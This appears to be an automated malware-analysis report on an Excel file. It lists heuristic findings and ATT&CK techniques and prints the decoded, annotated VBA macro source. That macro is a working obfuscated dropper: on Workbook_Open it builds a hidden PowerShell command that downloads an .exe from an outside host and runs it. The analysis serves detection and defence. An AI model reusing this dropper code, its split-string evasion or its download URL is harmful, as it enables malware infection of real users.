MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File: User Execution
T1059 Command and Scripting Interpreter
The sample is an Excel file containing VBA macros, specifically a Workbook_Open macro (which runs automatically once macros are enabled) that uses the Shell() function. This function is used to execute a command, which is obfuscated using string concatenation to reassemble 'cmd /c'. The macro's intent is to download and execute a second-stage payload, as indicated by the critical heuristic firings and the nature of the Shell() call. The document body's Japanese text and yellow message bar are a common lure to get the user to enable macros.
Heuristics 5
-
ClamAV: Xls.Dropper.Generic-6595971-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
-
VBA macros detected — medium — 3 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Shell() call in VBA — critical — OLE_VBA_SHELL: Shell() call in VBA
-
Dangerous API name reassembled from split string literals — critical — OLE_VBA_SPLIT_KEYWORD_OBFUSCATION: VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
Workbook_Open macro — high — OLE_VBA_WBOPEN: Workbook_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3231 bytes |

SHA-256: 3aff8fe7acc4afd7b10bc38f258ab40134e3172410c7191d3c9cb52c2ba09c03
Preview script — first 1,000 lines of the extracted script
' Module header of the ThisWorkbook module as decoded by oletools.olevba.
' These Attribute lines are VBA module metadata, not procedure code.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Returns one fragment of the command assembled in Workbook_Open. The fragment
' is built from short string literals plus the result of versusgame(); no single
' literal holds a recognisable keyword (report heuristic
' OLE_VBA_SPLIT_KEYWORD_OBFUSCATION).
Function yogaindiaa()
shabolaaa = "VI" + "r'" + ",'N" + "t'," + "'mE') ; "
yogaindiaa = "$7d" + "0mK6 = [" + versusgame + "}{2" + "}\"" -f '" + "on'" + ",'eN" + shabolaaa
End Function
' Fragment helper used by yogaindiaa(): returns a string containing indexed
' placeholders ({1}{0}{3}) that the surrounding command fills in at run time.
Function versusgame()
versusgame = "Typ" + "e](\""{" + "1}{0" + "}{3"
End Function
' Returns a fragment of the command assembled in Workbook_Open; built purely
' from split literals, with the tail held in the local palmaoils.
Function diplodosea()
palmaoils = "{D`e" + "s} = $7d"
diplodosea = "d" + "o{&(\""{1}" + "{0}\"" -f'ep','" + "sle'" + ") 31;$" + palmaoils
End Function
' Returns the opening fragment of the download expression built in
' Workbook_Open: indexed placeholders ({0}…{6}) followed by the first of the
' pieces that are later reordered into a type name.
Function dabalokok()
dabalokok = "(\""{" + "0}" + "{2}{" + "1}{3}{" + "5}{6}" + "{4}\""" + "-f'" + "S" + "y','t" + "e','s" + "','m"
End Function
' Returns a mixed-case fragment of a method name used in Workbook_Open; the
' mixed case appears to be another keyword-scanning evasion alongside the
' literal splitting.
Function hablloker()
hablloker = "OaDfiLE.IN"
End Function
' Returns an option fragment consumed by samoevsbruna().
Function gemeremi()
gemeremi = "oP" + "Ro" + "FI -W"
End Function
' Returns an option fragment consumed by samoevsbruna().
Function gyroskopius()
gyroskopius = "d" + "en" + " -n"
End Function
' Returns an option fragment consumed by abigalevermont().
Function flibaloba()
flibaloba = "nON" + "inT"
End Function
' Returns the closing fragment of the interpreter options assembled in
' abigalevermont(); ends with a space and a literal double quote.
Function curveastell()
bermudass = "a"
curveastell = bermudass + "ss " + " """
End Function
' Returns the head of the command executed in Workbook_Open: the interpreter
' invocation from samoevsbruna() followed by option fragments from flibaloba()
' and curveastell(). Both "+" and "&" concatenate strings here; mixing them
' looks like a further attempt to vary the pattern rather than a functional
' difference.
Function abigalevermont()
abigalevermont = samoevsbruna + "o -" + flibaloba + "eR" & "a -Ex" + "eC" & "uTI" + "On" + "P b" + "yP" + curveastell
End Function
' Returns the interpreter prefix of the command: the "cmd /c" keyword named in
' the report summary, then a mixed-case "powershell" keyword and option pieces
' from gemeremi() and gyroskopius(), all spread over one- to three-character
' literals so that no single literal matches a keyword scanner.
Function samoevsbruna()
samoevsbruna = "c" + "m" + "d " + " /" + "c""" & "p" + "Ow" + "Er" + "sHe" + "Ll" + " -n" + gemeremi + "in " + " H" & "iD" + gyroskopius + "oL"
End Function
' Returns the tail of a folder name used in Workbook_Open (prefixed there
' with "De").
Function terraincognitoo()
terraincognitoo = "skt" + "op"
End Function
' Auto-run entry point (report heuristic OLE_VBA_WBOPEN). Assembles the
' obfuscated command from the fragment functions in this module and passes it
' to Shell() (report heuristic OLE_VBA_SHELL). Per the report summary the
' command downloads and executes a second-stage payload.
Sub Workbook_Open()
' Assigned but never read anywhere in this listing.
vintagenioe = "p"
' msoArrowheadWidthMixed is an Office enum constant, so this is a constant
' condition rather than a real check; presumably always true — confirm.
If msoArrowheadWidthMixed < 0.87 Then
Dim planeverythink As String
' Window-style argument for the Shell() call below, derived from an Office
' enum constant. NOTE(review): looks like it evaluates to 0 (hidden window)
' — confirm against the enum value.
ernestohimm = msoColorTypeCMYK - 3
' Random integer, reused below as the numeric part of a "<n>.exe" file name.
Randomize
planeverythink = Int(Rnd * 9882761#)
deathlifeone = planeverythink
' Download fragment: starts with dabalokok(), contains an http:// URL split
' across literals, and names a "<random>.exe" target.
antaaaanana = dabalokok + ".Ne','enT','t.WeB','ClI')).dOwNL" + hablloker + "VokE(\""ht" + "t" + "p:/" + "/gober" + "tonis.c" + "om/n" + "ote\"",\""$" + "Des\" + deathlifeone + ".e" + "xe\"")}"
' Further fragment built from diplodosea(), digitpiii() and terraincognitoo()
' plus split literals.
perlitdiamond = diplodosea + "0mk" + "6::gE" + digitpiii + "TH(\""De" + terraincognitoo + "\"")" + ";(&(" + "\""{0}{1" + "}{2}\""" + " -f'N" + "e','w-" + "','O" + "bj" + "ect') "
' Closing fragment from hippporose(), ending with the same "<random>.exe" name.
inicedays = hippporose + deathlifeone + ".ex" + "e"""
' Full command: every fragment concatenated in order.
gabrieleanna = abigalevermont + yogaindiaa + perlitdiamond + antaaaanana + inicedays
' Executes the reassembled command; ernestohimm selects the window style.
Shell gabrieleanna, ernestohimm
End If
End Sub
' Returns the middle of a method name used in Workbook_Open ("gE" … "TH"),
' split into short mixed-case literals.
Function digitpiii()
digitpiii = "tFo" + "Ld" + "eR" + "Pa"
End Function
' Returns a fragment consumed by hippporose(); built purely from split literals.
Function shipseariver()
shipseariver = "s" + "s'," + "'ar" + "t'," + "'-" + "Pr')" + " $D"
End Function
' Returns the closing fragment of the command. The If compares two numeric
' literals and is therefore always true; it serves only to break up the
' straight-line shape of the function.
Function hippporose()
If 544 < 877533 Then
hippporose = "whi" + "le(" + "!${?}" + ");&(\""{" + nulliggg + "t','o" + "ce" + shipseariver + "e" + "s\"
End If
End Function
' Returns an indexed-placeholder fragment ({0}{2}{3}{1}) consumed by hippporose().
Function nulliggg()
nulliggg = "0}{" + "2}{3" + "}{1}" + "\""-f 'S"
End Function
' Module header of the Sheet1 module as decoded by oletools.olevba. No
' procedures follow it in the extracted text.
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True